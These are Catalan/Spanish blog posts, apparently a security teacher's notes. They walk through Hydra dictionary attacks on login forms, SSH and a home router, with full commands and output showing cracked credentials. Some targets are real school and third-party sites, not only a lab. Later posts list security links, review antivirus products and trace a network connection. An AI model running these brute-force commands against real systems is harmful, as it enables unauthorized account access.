domingo, 31 de enero de 2016

hydra contra distribució DVL, wordpress

després d'arrancar amb virtualbox la districió DVL, arrancar serveis http i mysql
anar a la ruta  http://bt.example.net/webexploitation_package_02/wordpress/wp-login.php

(abans arreglar entrant com administrador el directori de que enlloc de treballar com localhost, que es cridi a bt.example.net que és el hostname de la màquina) - de la mateixa manera a la kali afegim a host la entrada bt.example.net

mirem fitxer wp-login.php de validació de wordpress per identificar les variables a parametritzar amb hydra.

<form name="loginform" id="loginform" action="wp-login.php" method="post">
<p><label>Username:<br /><input type="text" name="log" id="log" value="" size="20" tabindex="1" /></label></p>
<p><label>Password:<br /> <input type="password" name="pwd" id="pwd" value="" size="20" tabindex="2" /></label></p>
<p class="submit">
 
hydra bt.example.net -l admin -P /usr/share/john/password.lst 
http-post-form '/webexploitation_package_02/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:failed;'
 
en aquest sistema el sistema no identifica correctament encertar el password , pero si ho podem 
vveure en el wireshark la redirecció que es produeix en posar la combinació correcta. Ho identifiquem 
per se la redirecció 302 
 
 
 
buscant el port origen de la comunicació 33873 em serveix per trobar la combinació correcta.
 
 
 

comprobar con hydra fortaleza contraseña web

hydra per serveis ssh
 
hydra ies-sabadexx.xxx -L users-ordinadorssh -p xxxx ssh -s xx -t 2 -vV
 
 [ATTEMPT] target ies-sabad - login "15smx2b24" - pass "xxx" - 24 of 30 [child 1]
[ATTEMPT] target ies-saba - login "15smx2b25" - pass "xxxx" - 25 of 30 [child 0]
[81][ssh] host: ies-saba   login: 15smx2b24   password: xxx
[ATTEMPT] target ies-sab - login "15smx2b26" - pass "xxxx" - 26 of 30 [child 1]
[81][ssh] host: ies-sab   login: 15smx2b26   password: xxxx

 
CONTRA LA WEB 
 
 
 
<form name="form1" method="post" action="users.php">            
            <p> User: <input name="user" type="text" id="user"></p>
            <p> Password: <input name="pass" type="password" id="pass"></p>
            <p />
            <p><input type="submit" name="Entrar" value="Submit"></p>
          </form>



en cas de fallar les variable suser i password obtenim
<header>
  <title>Error</title>
  <link type="text/css" rel="stylesheet" href="hard.css" />
</header>
<body>
    <div id="main">
      <div id="capsalera"></div>
      <div id="result"> 
      <h1>login failed!</h1>
      <p></p>
      <p id="resultat">Are you authorised to login?</p>
      <img src="failed.jpg" width=500>

 en cas de coneixer la contrasenya d'entrada al servei (normalment no passarà mai) obtindria una pàgina diferent.

<header>
  <title>Freak's members zone</title>
  <link type="text/css" rel="stylesheet" href="hard.css" />
</header>
<body>
    <div id="main">
 <div id="capsalera"></div>
 <div id="result">
<h1> Login Ok!</h1>


 fem la prova
hydra ies-sabadell.cat -l torres -P /usr/share/john/password.lst http-post-form '/~10smx162/smx/users.php:user=^USER^&pass=^PASS^:failed!' -vV -s 80 -t 10

ERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/private.php
[VERBOSE] Page redirected to http://ies-sabadell.cat/~10smx162/smx/failedpassword.php


en el nostre cas, la redirecció a una web  diferent és la condició d'exit. encara que el sistema no sigui capaç de detectar-la correctament


Provar amb el router de casa

ROUTER DE CASA
root@kali:~/Baixades# hydra 192.168.1.1 -l 1234 -P /usr/share/john/password.lst -t 2 -vV -s 80 http-get

hydra –l 1234 –P /root/password.lst –e ns –f –vV 192.168.1.1 http-get

-l per usuari a provar (1234 usuari de telefonica router) o -L per agafar usuaris d'un fitxer
-p per provar un password o -P per  provar un fitxer de passwords
-t 2 per forçar el num de proves per segon, d'aquesta manera en prova 2 (per defecte fa 16)
-vV modo verbose, que ens ensenyi les proves que fa, i les respostes que obté del servidor ( la redirecció de la pàgina)
-s 80 per indicar el port del servei
http-get el metode de la pàgina web per passar-li el paràmetre

[ATTEMPT] target 192.168.1.1 - login "1234" - pass "carmen" - 17 of 3551 [child 15]
[ATTEMPT] target 192.168.1.1 - login "1234" - pass "mickey" - 18 of 3551 [child 1]
[80][http-get] host: 192.168.1.1   login: 1234   password: 1234
[STATUS] attack finished for 192.168.1.1 (valid pair found)


otras sentencias muy útiles:

    -R esto restaura la sesión anterior que se nos haya caído (muy normal cuando nuestro pc no es muy bueno) o que hayamos abortado [-R].
    -S se conecta por SSL [-S].
     -C Esta sentencia se usa eliminando -l/-L y -p/-P ya que aquí se especifica un diccionario combo, osea que tenga tanto usuario como contraseña con el formato user:pass [-C diccionario-combo.txt].
    -o Esto es muy útil ya que nos ira dejando en un documento que nosotros especifiquemos todas las contraseñas y usuarios que vaya sacando [-o output.txt].
    -f Se cierra Hydra después de encontrar el primer password [-f].
    -w Con este se puede especificar el tiempo máximo (en segundos) que queramos que este crackeando passwords [-w 9999999].
 

service the service to crack. Supported protocols: telnet ftp pop3 imap smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth pcanywhere teamspeak sip vmauthd firebird ncp afp

OPT some service modules need special input (see README!)

En ocasiones, los ataques son cancelados por multitud de razones, hydra en estos casos genera un fichero llamado “hydra.restore” que contiene la última sesión ejecutada por THC Hydra, de este modo es posible continuar con ataques inconclusos partiendo desde el ultimo estado del ataque, para esto se emplea la opción -R
http://thehackerway.com/2011/04/08/hydra-ataques-de-fuerza-bruta/
http://insidetrust.blogspot.com.es/2011/08/using-hydra-to-dictionary-attack-web.html

REPTES - PROVAR AMB WEBS NO PERSONALS I AMB UNA ESTRUCTURA DE PAS D'UN PARÀMETRE OCULTE
http://insestatut.cat/index/index.php/component/users/?view=login

<form action="/index/index.php/component/users/?task=user.login" method="post" class="form-validate form-horizontal well">

  <fieldset>
            <div class="control-group">
      <div class="control-label">
       <label id="username-lbl" for="username" class="required">
 Usuari<span class="star">&#160;*</span></label>      </div>
      <div class="controls">
       <input type="text" name="username" id="username" value="prova" class="validate-username required" size="25" required aria-required="true" />      </div>
     </div>
                <div class="control-group">
      <div class="control-label">
       <label id="password-lbl" for="password" class="required">
 Contrasenya<span class="star">&#160;*</span></label>      </div>
      <div class="controls">
       <input type="password" name="password" id="password" value="test" class="validate-password required" size="25" maxlength="99" required aria-required="true" />      </div>
     </div>
       
   
      <div  class="control-group">
    <div class="control-label"><label>Recorda'm</label></div>
    <div class="controls"><input id="remember" type="checkbox" name="remember" class="inputbox" value="yes"/></div>
   </div>
   
   <div class="control-group">
    <div class="controls">
     <button type="submit" class="btn btn-primary">
      Entra     </button>
    </div>
   </div>

   <input type="hidden" name="return" value="aW5kZXgucGhwP0l0ZW1pZD0xMDE=" />
   <input type="hidden" name="1cd1a7618469095f6919628b44c54a6b" value="1" />  </fieldset>
 </form>

Avís

Ha fallat l'autenticació: Accés denegat


PROVES SOLTES
 hydra -l admin -P /usr/share/john/password.lst ies-sabadell.cat http-post-form '/cicles-moodle/login/index.php:user=^USER^&pass=^PASS^:Invalid.C=/cicles-moodle/login/index.php'

domingo, 24 de enero de 2016

links seguretat informàtica

links seguretat informàtica

notícies seguretat / blogs seguretat
http://www.rapid7.com/        https://community.rapid7.com/community/infosec/blog/
http://www.securitybydefault.com/
http://www.securityartwork.es/
http://www.elladodelmal.com/
http://www.flu-project.com
http://blog.segu-info.com.ar/ 
 http://hispasec.com/
http://www.hackplayers.com/  
https://www.owasp.org/index.php/Main_Page

empreses seguretat i programes
http://www.rapid7.com/resources/free-tools.jsp
http://www.securitybydefault.com/p/herramientas-sbd.html
http://www.flu-project.com/p/herramientas-de-seguridad.html 
http://sourceforge.net/directory/os:windows/?q=google%20dork%20scanner cercador google dork_scanner
http://sourceforge.net/projects/d4arker/?source=recommended
http://sourceforge.net/projects/forkaliscript/?source=recommended
http://sourceforge.net/projects/gamja/?source=recommended web vulnerability scanner


informació sobre webs/cercadors
https://www.robtex.com/
https://www.shodan.io     cercador internet de les coses

informació-reptes hacking
http://www.flu-project.com/p/retos-hacking.html

webs exploits
http://sec.jetlib.com/     http://sec.jetlib.com/Exploit-DB/
https://www.exploit-db.com/

e-learning security
https://hack.me/

versions vulnerables
http://exploit.co.il/projects/vuln-web-app/
http://blog.segu-info.com.ar/2015/10/aplicacion-web-extremadamente.html
http://dvwa.co.uk/
https://information.rapid7.com/metasploitable-download.html?LS=1631875&CS=w


noticies individuals
http://highsec.es/2013/07/dns-gathering-transferencia-de-zona-shodan-resolucion-inversa-ataque-de-diccionario-y-maltego/
http://www.flu-project.com/2013/07/escaneres-de-vulnerabilidades-web-cual_28.html
http://www.hackplayers.com/2016/01/recopilacion-de-videos-de-con-2015.html 

links distribucions seguretat informàtica
https://www.kali.org/

link escola
http://elpuig.xeill.net/Members/vcarceler/c5/na3/a5
acacha.org

links generics
http://www.adminso.es/index.php/Transferencias_de_zonas_DNS_no_autorizadas 

viernes, 29 de noviembre de 2013

comparativa antivirus 2013 de tomshardware

en la comparativa da como ganador avast como mejor antivirus 2013 libre de pago 

Free Antivirus Software: The Best of 2013

parte de la conclusión es 

Though it doesn't finish first on all tests, Avast! wins this year with very similar performances in all sectors. It beats everything else on phishing and blocking dangerous websites. Still, this does not mean that it is the antivirus that best suits everyone.

via translate de google

A pesar de que no termina en primer lugar en todas las pruebas, Avast! gane este año con actuaciones muy similares en todos los sectores. Es mejor que todo lo demás en el phishing y bloqueo de sitios web peligrosos. Sin embargo, esto no quiere decir que es el antivirus que mejor se adapte a todos.

os animo a leer el artículo y valorarlo

http://www.tomsguide.com/us/best-free-antivirus-software-2013,review-1788.html

domingo, 27 de octubre de 2013

analisis de los puertos del ordenador, 5222 sobre la ip 173.194.78.125

ya va siendo en diversas ocasiones que al hacer un netstat en mi ordenador, aparecen un grupo de conexiones que puedo creer que conozoco o yo provoco, pero esta del puerto 5222 no acabarla de asociarla con ningún servicion en concreto que estuviera corriendo en el ordenador.
he intentado hacer un telnet al puerto 5222 pero no ha contestado nada, he tomado nmap para escanear dicho puerto nmap -p 5222 -T4 -A -v 173.194.78.125
bien, parece ser el servicio google-talk , como se ve en el certificado , commonName=talk.google.com pero yo no tenía abierto el chrome ni estaba logado en la cuenta de gmail, miro de nuevo el netstat y ahora realizo netstat -anb simplemente porque me de el nombre del proceso
pocketcloudservice, pero si pensaba que estaba parado y porqué un servicio que está relacionado con googletalk en apariencia interviene pocketcloudservice, programa para poder ver desde el movil el ordenador? I am getting the "Cannot connect to server" error. I have followed all steps from above and in your comments. I am running windows 7 Pro. The computer I am trying to RDP is on a network and is connected to a SBS 2008 server with a firewall. I have opened ports 5222 and 443 on the server firewall. I have logged in with google account to both pocketcloud windows companion and for the iPad. I checked all 4 boxes for remote desktop in the windows firewall settings. Am I missing something since I am connected to a server?

jueves, 24 de octubre de 2013

metallica 3d Through the never

Con las prisas buscaba descargar via torrent metallica 3d Through the never, rápido que hay que amortizar la adsl y de todas maneras con los niños no puedo ir al cine a ver esta pelicula todo bien, descarga torrent, con suficientes semillas para que la cosa vaya ligera , con un nombre el torrent que presagiaba buena calidad, Metallica Through the Never (2013) BRRip XviD Original Torrent.mp4. vuelvo de recoger el niño de ingles y utorrent me indica que ya está descargado. doble clic para ver que tal.......... a pesar de ser mp4 , desconfio un poco y le paso el antivirus
BIEN ,Y AHORA QUE? FALSO POSITIVO? despues continuo, ahora toca ir a buscar al otro peque de ingles........

miércoles, 23 de octubre de 2013

Network Monitoring Software - vulnerabilidades

estoy en busqueda de herramientas para monitoritzar la red, y sobre todo que me hagan un mapa de la misma bastante fiable. Hasta ahora la mejor herramienta que he probado es fluke network map que ya tiene sus añitos y no he conseguido de otra que sea tan fiable. esta es una de las pruebas realizadas con spiceworks The typical network is like a grand central of information. Keep track of it all with Spiceworks easy-to-use interface – where you want, when you want – for free! Here’s what else Spiceworks Networking Monitoring software can help you do:
con un apartado inventory summary donde me indica la distribución de los distintos dispositivos, un security center donde me indica si el antivirus está desactualizado, Alertas sobre el toner de la impresora donde distintos colores estan por debajo del 10% y como vemos en la foto posterior indicación que alerta de màquina desactualizada.... , una joya para tener toda la gestión centralizada. Al ver la alerta buscaba el porqué me lo indicaba, foto adjunta. Buen aviso de seguridad pasiva sin esperarmelo....
en apariencia me parece buena herramienta, de prueba durante 30 días, ya iremos viendo. Por último y dado que iba buscando una herramientas de dibujos de mapa de red automática , esto es lo optenido. no acabo de entender porque dibuja tantas lineas, algunas de más entre los swtichos pero para tener un punto de partida, tampoco está mal, aunque me parece confuso.